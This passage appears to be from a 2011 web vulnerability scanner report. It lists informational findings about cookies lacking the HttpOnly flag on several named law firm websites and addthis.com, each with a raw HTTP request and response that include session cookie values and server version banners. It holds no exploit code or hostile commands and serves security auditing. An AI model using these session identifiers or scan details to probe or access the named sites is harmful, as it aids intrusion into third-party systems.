The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sec/scripts/resize.gif HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 18:16:02 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=29340847b7f54c8a31121fcf97226cdc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3114
Content-Type: text/html

       <td rowspan="2">                        
           <table width="100%" border="0" cellspacing="0" cellpadding="15">                            
               <tr valign="top">                                
                   <td class="sub"><!-- #BeginEditable "body" -->
                                   <h1>E
...[SNIP]...

10.34. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

10.35. http://www.cov.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1116; path=/
Set-Cookie: PortletId=1040301; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 29292
Set-Cookie: NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660;path=/
Content-Length: 29292


<html>
   <head><meta name="description" content=""><meta name="KEYWORDS" content="litigation">
<title id="htmlTitle">Covington &amp; Burling LLP</title>
       <link href="/FCWSite/Include/gene
...[SNIP]...

10.36. http://www.cov.com/en-US/regions/middle_east/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /en-US/regions/middle_east/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-US/regions/middle_east/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Middle East</titl
...[SNIP]...

10.37. http://www.cov.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1116; PortletId=1040301; SiteId=1087; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; ZoneId=7; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:08:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 425
Content-Length: 425


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

10.38. http://www.cov.com/health_care/health_care_reform/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /health_care/health_care_reform/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /health_care/health_care_reform/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:52 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Health Care Refor
...[SNIP]...

10.39. http://www.cov.com/industry/financial_services/dodd_frank/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /industry/financial_services/dodd_frank/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /industry/financial_services/dodd_frank/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Dodd-Frank Regula
...[SNIP]...

10.40. http://www.cov.com/ja-JP/practice/region.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /ja-JP/practice/region.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ja-JP/practice/region.aspx HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 19 Jan 2011 15:46:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error.html?aspxerrorpath=/FCWSite/Features/Services/region.aspx
Set-Cookie: Language=9ea607c8-9b1f-4d48-8f17-55bea1b70c47; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2>
</body></html>

10.41. http://www.cov.com/ko-KR/practice/region.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /ko-KR/practice/region.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ko-KR/practice/region.aspx HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 19 Jan 2011 15:46:32 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error.html?aspxerrorpath=/FCWSite/Features/Services/region.aspx
Set-Cookie: Language=af203ebe-34a8-4674-98e1-76447e0b5d76; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2>
</body></html>

10.42. http://www.cov.com/news/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/detail.aspx HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10753


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...

10.43. http://www.cov.com/practice/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /practice/ HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:19:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247861
Content-Length: 247861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...

10.44. http://www.cov.com/zh-CN/practice/region.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /zh-CN/practice/region.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zh-CN/practice/region.aspx HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 19 Jan 2011 15:44:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error.html?aspxerrorpath=/FCWSite/Features/Services/region.aspx
Set-Cookie: Language=8d3b6585-6a63-4372-bcac-71fa92156eab; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2>
</body></html>

10.45. http://www.fulbright.com/Austin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Austin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Austin HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:53:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
